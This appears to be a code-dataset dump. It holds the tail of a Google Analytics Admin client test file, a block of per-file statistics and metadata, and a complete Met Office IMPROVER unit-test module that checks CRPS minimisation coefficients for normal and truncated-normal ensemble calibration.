AnalyticsAdminServiceClient.ios_app_data_stream_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_ios_app_data_stream_path(path) assert expected == actual def test_measurement_protocol_secret_path(): property = "squid" web_data_stream = "clam" measurement_protocol_secret = "whelk" expected = "properties/{property}/webDataStreams/{web_data_stream}/measurementProtocolSecrets/{measurement_protocol_secret}".format( property=property, web_data_stream=web_data_stream, measurement_protocol_secret=measurement_protocol_secret, ) actual = AnalyticsAdminServiceClient.measurement_protocol_secret_path( property, web_data_stream, measurement_protocol_secret ) assert expected == actual def test_parse_measurement_protocol_secret_path(): expected = { "property": "octopus", "web_data_stream": "oyster", "measurement_protocol_secret": "nudibranch", } path = AnalyticsAdminServiceClient.measurement_protocol_secret_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_measurement_protocol_secret_path(path) assert expected == actual def test_property_path(): property = "cuttlefish" expected = "properties/{property}".format(property=property,) actual = AnalyticsAdminServiceClient.property_path(property) assert expected == actual def test_parse_property_path(): expected = { "property": "mussel", } path = AnalyticsAdminServiceClient.property_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_property_path(path) assert expected == actual def test_user_link_path(): account = "winkle" user_link = "nautilus" expected = "accounts/{account}/userLinks/{user_link}".format( account=account, user_link=user_link, ) actual = AnalyticsAdminServiceClient.user_link_path(account, user_link) assert expected == actual def test_parse_user_link_path(): expected = { "account": "scallop", "user_link": "abalone", } path = AnalyticsAdminServiceClient.user_link_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_user_link_path(path) assert expected == actual def test_web_data_stream_path(): property = "squid" web_data_stream = "clam" expected = "properties/{property}/webDataStreams/{web_data_stream}".format( property=property, web_data_stream=web_data_stream, ) actual = AnalyticsAdminServiceClient.web_data_stream_path(property, web_data_stream) assert expected == actual def test_parse_web_data_stream_path(): expected = { "property": "whelk", "web_data_stream": "octopus", } path = AnalyticsAdminServiceClient.web_data_stream_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_web_data_stream_path(path) assert expected == actual def test_common_billing_account_path(): billing_account = "oyster" expected = "billingAccounts/{billing_account}".format( billing_account=billing_account, ) actual = AnalyticsAdminServiceClient.common_billing_account_path(billing_account) assert expected == actual def test_parse_common_billing_account_path(): expected = { "billing_account": "nudibranch", } path = AnalyticsAdminServiceClient.common_billing_account_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_common_billing_account_path(path) assert expected == actual def test_common_folder_path(): folder = "cuttlefish" expected = "folders/{folder}".format(folder=folder,) actual = AnalyticsAdminServiceClient.common_folder_path(folder) assert expected == actual def test_parse_common_folder_path(): expected = { "folder": "mussel", } path = AnalyticsAdminServiceClient.common_folder_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_common_folder_path(path) assert expected == actual def test_common_organization_path(): organization = "winkle" expected = "organizations/{organization}".format(organization=organization,) actual = AnalyticsAdminServiceClient.common_organization_path(organization) assert expected == actual def test_parse_common_organization_path(): expected = { "organization": "nautilus", } path = AnalyticsAdminServiceClient.common_organization_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_common_organization_path(path) assert expected == actual def test_common_project_path(): project = "scallop" expected = "projects/{project}".format(project=project,) actual = AnalyticsAdminServiceClient.common_project_path(project) assert expected == actual def test_parse_common_project_path(): expected = { "project": "abalone", } path = AnalyticsAdminServiceClient.common_project_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_common_project_path(path) assert expected == actual def test_common_location_path(): project = "squid" location = "clam" expected = "projects/{project}/locations/{location}".format( project=project, location=location, ) actual = AnalyticsAdminServiceClient.common_location_path(project, location) assert expected == actual def test_parse_common_location_path(): expected = { "project": "whelk", "location": "octopus", } path = AnalyticsAdminServiceClient.common_location_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_common_location_path(path) assert expected == actual def test_client_withDEFAULT_CLIENT_INFO(): client_info = gapic_v1.client_info.ClientInfo() with mock.patch.object( transports.AnalyticsAdminServiceTransport, "_prep_wrapped_messages" ) as prep: client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), client_info=client_info, ) prep.assert_called_once_with(client_info) with mock.patch.object( transports.AnalyticsAdminServiceTransport, "_prep_wrapped_messages" ) as prep: transport_class = AnalyticsAdminServiceClient.get_transport_class() transport = transport_class( credentials=ga_credentials.AnonymousCredentials(), client_info=client_info, ) prep.assert_called_once_with(client_info) @pytest.mark.asyncio async def test_transport_close_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio", ) with mock.patch.object( type(getattr(client.transport, "grpc_channel")), "close" ) as close: async with client: close.assert_not_called() close.assert_called_once() def test_transport_close(): transports = { "grpc": "_grpc_channel", } for transport, close_name in transports.items(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport ) with mock.patch.object( type(getattr(client.transport, close_name)), "close" ) as close: with client: close.assert_not_called() close.assert_called_once() def test_client_ctx(): transports = [ "grpc", ] for transport in transports: client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport ) # Test client calls underlying transport. with mock.patch.object(type(client.transport), "close") as close: close.assert_not_called() with client: pass close.assert_called()
38.535037
138
0.695331
97,727
863,917
5.894297
0.007153
0.027537
0.025322
0.057136
0.979845
0.971191
0.953668
0.942198
0.931558
0.918018
0
0.006381
0.22778
863,917
22,418
139
38.536756
0.857062
0.211055
0
0.735439
0
0
0.064287
0.021008
0
0
0
0.000045
0.140027
1
0.038032
false
0.000066
0.001862
0.000133
0.040027
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c77b100b06f2addd18ef1457afdfd889ec7c4c33
35,791
py
Python
improver_tests/calibration/ensemble_calibration/test_ContinuousRankedProbabilityScoreMinimisers.py
yzhaobom/improver
47f9e103c63f890bfbb24d5e08d9d01d041514f7
[ "BSD-3-Clause" ]
null
null
null
improver_tests/calibration/ensemble_calibration/test_ContinuousRankedProbabilityScoreMinimisers.py
yzhaobom/improver
47f9e103c63f890bfbb24d5e08d9d01d041514f7
[ "BSD-3-Clause" ]
4
2017-05-24T10:30:02.000Z
2021-09-30T08:58:50.000Z
improver_tests/calibration/ensemble_calibration/test_ContinuousRankedProbabilityScoreMinimisers.py
btrotta-bom/improver
dbe08f379072b5d5074ce4ad661c37a9f40437c0
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # (C) British Crown Copyright 2017-2021 Met Office. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ Unit tests for the `ensemble_calibration.ContinuousRankedProbabilityScoreMinimisers` class. """ import unittest import iris import numpy as np from iris.tests import IrisTest from improver.calibration.ensemble_calibration import ( ContinuousRankedProbabilityScoreMinimisers as Plugin, ) from improver.calibration.utilities import convert_cube_data_to_2d from improver.utilities.warnings_handler import ManageWarnings from .helper_functions import EnsembleCalibrationAssertions, SetupCubes class SetupInputs(IrisTest): """Set up inputs for testing.""" def setUp(self): """Set up inputs for testing.""" super().setUp() self.sqrt_pi = np.sqrt(np.pi).astype(np.float64) self.initial_guess_for_mean = np.array([0, 1, 0, 1], dtype=np.float64) self.initial_guess_for_realization = np.array( [0, np.sqrt(1 / 3.0), np.sqrt(1 / 3.0), np.sqrt(1 / 3.0), 0, 1], dtype=np.float64, ) class SetupNormalInputs(SetupInputs, SetupCubes): """Create a class for setting up cubes for testing.""" @ManageWarnings( ignored_messages=["Collapsing a non-contiguous coordinate."], warning_types=[UserWarning], ) def setUp(self): """Set up expected inputs.""" super().setUp() # Set up cubes and associated data arrays for temperature. self.forecast_predictor_mean = self.historic_temperature_forecast_cube.collapsed( "realization", iris.analysis.MEAN ) self.forecast_predictor_realizations = ( self.historic_temperature_forecast_cube.copy() ) self.forecast_variance = self.historic_temperature_forecast_cube.collapsed( "realization", iris.analysis.VARIANCE ) self.truth = self.historic_temperature_forecast_cube.collapsed( "realization", iris.analysis.MAX ) self.forecast_predictor_data = self.forecast_predictor_mean.data.flatten().astype( np.float64 ) self.forecast_predictor_data_realizations = convert_cube_data_to_2d( self.historic_temperature_forecast_cube.copy() ).astype(np.float64) self.forecast_variance_data = self.forecast_variance.data.flatten().astype( np.float64 ) self.truth_data = self.truth.data.flatten().astype(np.float64) class Test_calculate_normal_crps(SetupNormalInputs): """ Test minimising the CRPS for a normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up plugin.""" super().setUp() self.precision = 4 self.plugin = Plugin(tolerance=1e-4) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy float value with the mean as the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "mean" result = self.plugin.calculate_normal_crps( self.initial_guess_for_mean, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.3006, places=self.precision) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy float value with the ensemble realizations as the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "realizations" result = self.plugin.calculate_normal_crps( self.initial_guess_for_realization, self.forecast_predictor_data_realizations, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.3006, places=self.precision) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "invalid value encountered in", ], warning_types=[UserWarning, RuntimeWarning], ) def test_basic_mean_predictor_bad_value(self): """ Test that the plugin returns a numpy float64 value and that the value matches the BAD_VALUE, when the appropriate condition is found. The ensemble mean is the predictor. The initial guess is specifically set to float32 precision for the purpose for generating the BAD_VALUE for the unit test. """ initial_guess = np.array([1e65, 1e65, 1e65, 1e65], dtype=np.float32) predictor = "mean" result = self.plugin.calculate_normal_crps( initial_guess, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, self.plugin.BAD_VALUE, self.precision) class Test_process_normal_distribution( SetupNormalInputs, EnsembleCalibrationAssertions ): """ Test minimising the CRPS for a normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up expected output. The coefficients are in the order [alpha, beta, gamma, delta]. """ super().setUp() self.tolerance = 1e-4 self.plugin = Plugin(tolerance=self.tolerance) self.expected_mean_coefficients = [-0.0003, 1.0013, 0.0012, 0.5945] self.expected_realizations_coefficients = [ 0.0254, 0.4349, 0.39, 0.8122, -0.0016, 0.2724, ] self.expected_mean_coefficients_point_by_point = np.array( [ [ [0.0015, 0.0037, -0.002], [-0.0009, 0.0008, 0.0015], [-0.0046, 0.0053, -0.0038], ], [ [1.0039, 1.0035, 1.0009], [1.0013, 1.0011, 1.001], [1.002, 1.0015, 1.0008], ], [ [0.0017, -0.0009, -0.0002], [0.0054, 0.0003, -0.0002], [-0.0001, -0.0018, 0.0002], ], [ [-0.0, 0.0007, -0.0009], [0.0003, -0.0001, -0.001], [-0.0013, 0.0, 0.0006], ], ], dtype=np.float32, ) self.expected_mean_coefficients_point_by_point_sites = np.array( [ [0.0017, 0.0017, 0.0017, 0.0017], [1.0036, 1.0036, 1.0036, 1.0036], [0.0017, 0.0017, 0.0017, 0.0017], [-0.0, -0.0, -0.0, 0.0], ], dtype=np.float32, ) self.expected_realizations_coefficients_point_by_point = np.array( [ [ [0.0001, 0.0001, 0.0001], [0.0001, 0.0001, 0.0], [0.0001, 0.0001, 0.0001], ], [ [0.579, 0.5793, 0.5782], [0.5782, 0.5778, 0.5781], [0.5786, 0.5782, 0.5783], ], [ [0.5795, 0.5786, 0.5782], [0.5783, 0.578, 0.5767], [0.5791, 0.578, 0.5763], ], [ [0.5773, 0.5769, 0.5763], [0.5769, 0.5771, 0.5782], [0.5764, 0.5773, 0.5783], ], [ [0.0001, 0.0001, 0.0001], [0.0001, 0.0001, 0.0001], [0.0001, 0.0001, 0.0], ], [ [1.0194, 1.0143, 1.0199], [1.0199, 1.02, 1.013], [1.0144, 0.9885, 1.0246], ], ], dtype=np.float32, ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy array with the expected coefficients. The ensemble mean is the predictor. """ predictor = "mean" distribution = "norm" result = self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEqual(result.dtype, np.float32) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", "invalid value encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy array with the expected coefficients. The ensemble realizations are the predictor. """ predictor = "realizations" distribution = "norm" result = self.plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEqual(result.dtype, np.float32) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_mean_predictor_keyerror(self): """ Test that the minimisation has resulted in a KeyError, if the distribution that has been requested was not within the dictionary containing the minimisation functions. """ predictor = "mean" distribution = "foo" msg = "Distribution requested" with self.assertRaisesRegex(KeyError, msg): self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_mean_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble mean is the predictor assuming a normal distribution and the value specified for the max_iterations is overridden. The coefficients are calculated by minimising the CRPS. """ predictor = "mean" max_iterations = 400 distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", "invalid value encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_realizations_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble realizations are the predictor assuming a truncated normal distribution and the value specified for the MAX_ITERATIONS is overridden. The coefficients are calculated by minimising the CRPS. """ predictor = "realizations" max_iterations = 1000 distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_mean_predictor_point_by_point(self): """ Test that the expected coefficients are generated when the ensemble mean is the predictor for a normal distribution and coefficients are calculated independently at each grid point. The coefficients are calculated by minimising the CRPS. """ predictor = "mean" distribution = "norm" initial_guess = np.broadcast_to( self.initial_guess_for_mean, ( len(self.truth.coord(axis="y").points) * len(self.truth.coord(axis="x").points), len(self.initial_guess_for_mean), ), ) plugin = Plugin(tolerance=self.tolerance, point_by_point=True) result = plugin.process( initial_guess, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_mean_coefficients_point_by_point ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_mean_predictor_point_by_point_sites(self): """ Test that the expected coefficients are generated when the ensemble mean is the predictor for a normal distribution and coefficients are calculated independently at each site location. The coefficients are calculated by minimising the CRPS. """ forecast_spot_cube = self.historic_forecast_spot_cube.collapsed( "realization", iris.analysis.MEAN ) forecast_var_spot_cube = forecast_spot_cube.copy() forecast_var_spot_cube.data = forecast_var_spot_cube.data / 10.0 predictor = "mean" distribution = "norm" initial_guess = np.broadcast_to( self.initial_guess_for_mean, ( len(self.truth.coord(axis="y").points) * len(self.truth.coord(axis="x").points), len(self.initial_guess_for_mean), ), ) plugin = Plugin(tolerance=self.tolerance, point_by_point=True) result = plugin.process( initial_guess, forecast_spot_cube, self.truth_spot_cube, forecast_var_spot_cube, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_mean_coefficients_point_by_point_sites ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", "invalid value encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_realizations_predictor_point_by_point(self): """ Test that the expected coefficients are generated when the ensemble realizations are the predictor for a normal distribution and coefficients are calculated independently at each grid point. The coefficients are calculated by minimising the CRPS. """ predictor = "realizations" distribution = "norm" initial_guess = np.broadcast_to( self.initial_guess_for_realization, ( len(self.truth.coord(axis="y").points) * len(self.truth.coord(axis="x").points), len(self.initial_guess_for_realization), ), ) # Use a larger value for the tolerance to terminate sooner to avoid # minimising in computational noise. plugin = Plugin(tolerance=0.01, point_by_point=True) result = plugin.process( initial_guess, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertArrayAlmostEqual( result, self.expected_realizations_coefficients_point_by_point, decimal=2 ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings(self, warning_list=None): """ Test that a warning is generated if the minimisation does not result in a convergence. The ensemble mean is the predictor. """ predictor = "mean" distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=10) plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg = "Minimisation did not result in convergence after" self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg in str(item) for item in warning_list)) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings_percentage_change(self, warning_list=None): """ Test that two warnings are generated if the minimisation does not result in a convergence. The first warning reports a that the minimisation did not result in convergence, whilst the second warning reports that the percentage change in the final iteration was greater than the tolerated value. The ensemble mean is the predictor. """ initial_guess = np.array([5000, 1, 0, 1], dtype=np.float64) predictor = "mean" distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=5) plugin.process( initial_guess, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg_min = "Minimisation did not result in convergence after" warning_msg_iter = "The final iteration resulted in a percentage " self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg_min in str(item) for item in warning_list)) self.assertTrue(any(warning_msg_iter in str(item) for item in warning_list)) class SetupTruncatedNormalInputs(SetupInputs, SetupCubes): """Create a class for setting up cubes for testing.""" @ManageWarnings( ignored_messages=["Collapsing a non-contiguous coordinate."], warning_types=[UserWarning], ) def setUp(self): """Set up expected inputs.""" super().setUp() # Set up cubes and associated data arrays for wind speed. self.forecast_predictor_mean = self.historic_wind_speed_forecast_cube.collapsed( "realization", iris.analysis.MEAN ) self.forecast_predictor_realizations = ( self.historic_wind_speed_forecast_cube.copy() ) self.forecast_variance = self.historic_wind_speed_forecast_cube.collapsed( "realization", iris.analysis.VARIANCE ) self.truth = self.historic_wind_speed_forecast_cube.collapsed( "realization", iris.analysis.MAX ) self.forecast_predictor_data = self.forecast_predictor_mean.data.flatten().astype( np.float64 ) self.forecast_predictor_data_realizations = convert_cube_data_to_2d( self.historic_wind_speed_forecast_cube.copy() ).astype(np.float64) self.forecast_variance_data = self.forecast_variance.data.flatten().astype( np.float64 ) self.truth_data = self.truth.data.flatten().astype(np.float64) class Test_calculate_truncated_normal_crps(SetupTruncatedNormalInputs): """ Test minimising the crps for a truncated normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up plugin.""" super().setUp() self.precision = 4 self.plugin = Plugin(tolerance=1e-4) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy float value. The ensemble mean is the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "mean" result = self.plugin.calculate_truncated_normal_crps( self.initial_guess_for_mean, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.2150, self.precision) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy float value. The ensemble realizations are the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "realizations" result = self.plugin.calculate_truncated_normal_crps( self.initial_guess_for_realization, self.forecast_predictor_data_realizations, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.2150, self.precision) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "invalid value encountered in", ], warning_types=[UserWarning, RuntimeWarning], ) def test_basic_mean_predictor_bad_value(self): """ Test that the plugin returns a numpy float64 value and that the value matches the BAD_VALUE, when the appropriate condition is found. The ensemble mean is the predictor. The initial guess is specifically set to float32 precision for the purpose for generating the BAD_VALUE for the unit test. """ initial_guess = np.array([1e65, 1e65, 1e65, 1e65], dtype=np.float32) predictor = "mean" result = self.plugin.calculate_truncated_normal_crps( initial_guess, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, self.plugin.BAD_VALUE, self.precision) class Test_process_truncated_normal_distribution( SetupTruncatedNormalInputs, EnsembleCalibrationAssertions ): """ Test minimising the CRPS for a truncated normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up expected output.""" super().setUp() self.tolerance = 1e-4 self.plugin = Plugin(tolerance=self.tolerance) self.expected_mean_coefficients = [0.3958, 0.9854, -0.0, 0.621] self.expected_realizations_coefficients = [ 0.1898, -0.1558, 0.4452, 0.8877, -0.1331, -0.0002, ] @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "The final iteration resulted in", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy array. The ensemble mean is the predictor. """ predictor = "mean" distribution = "truncnorm" result = self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy array with the expected coefficients. The ensemble realizations are the predictor. """ predictor = "realizations" distribution = "truncnorm" result = self.plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_mean_predictor_keyerror(self): """ Test that an exception is raised when the distribution requested is not an available option when the predictor is the ensemble mean. """ predictor = "mean" distribution = "foo" msg = "Distribution requested" with self.assertRaisesRegex(KeyError, msg): self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "The final iteration resulted in", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[ UserWarning, UserWarning, UserWarning, RuntimeWarning, RuntimeWarning, ], ) def test_mean_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble mean is the predictor assuming a truncated normal distribution and the value specified for the max_iterations is overridden. The coefficients are calculated by minimising the CRPS. """ predictor = "mean" max_iterations = 400 distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_realizations_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble realizations are the predictor assuming a truncated normal distribution and the value specified for the max_iterations is overridden. The coefficients are calculated by minimising the CRPS. """ predictor = "realizations" max_iterations = 1000 distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings(self, warning_list=None): """ Test that a warning is generated if the minimisation does not result in a convergence. The ensemble mean is the predictor. """ predictor = "mean" distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=10) plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg = "Minimisation did not result in convergence after" self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg in str(item) for item in warning_list)) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings_percentage_change(self, warning_list=None): """ Test that two warnings are generated if the minimisation does not result in a convergence. The first warning reports a that the minimisation did not result in convergence, whilst the second warning reports that the percentage change in the final iteration was greater than the tolerated value. The ensemble mean is the predictor. """ initial_guess = np.array([0, 1, 5000, 1], dtype=np.float64) predictor = "mean" distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=5) plugin.process( initial_guess, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg_min = "Minimisation did not result in convergence after" warning_msg_iter = "The final iteration resulted in a percentage " self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg_min in str(item) for item in warning_list)) self.assertTrue(any(warning_msg_iter in str(item) for item in warning_list)) if __name__ == "__main__": unittest.main()
36.299189
90
0.618535
3,764
35,791
5.730871
0.10813
0.033378
0.031153
0.031338
0.869825
0.85462
0.843586
0.828103
0.815493
0.812433
0
0.030987
0.303009
35,791
985
91
36.336041
0.833721
0.213434
0
0.737681
0
0
0.10389
0
0
0
0
0
0.063768
1
0.043478
false
0
0.011594
0
0.065217
0
0
0
0
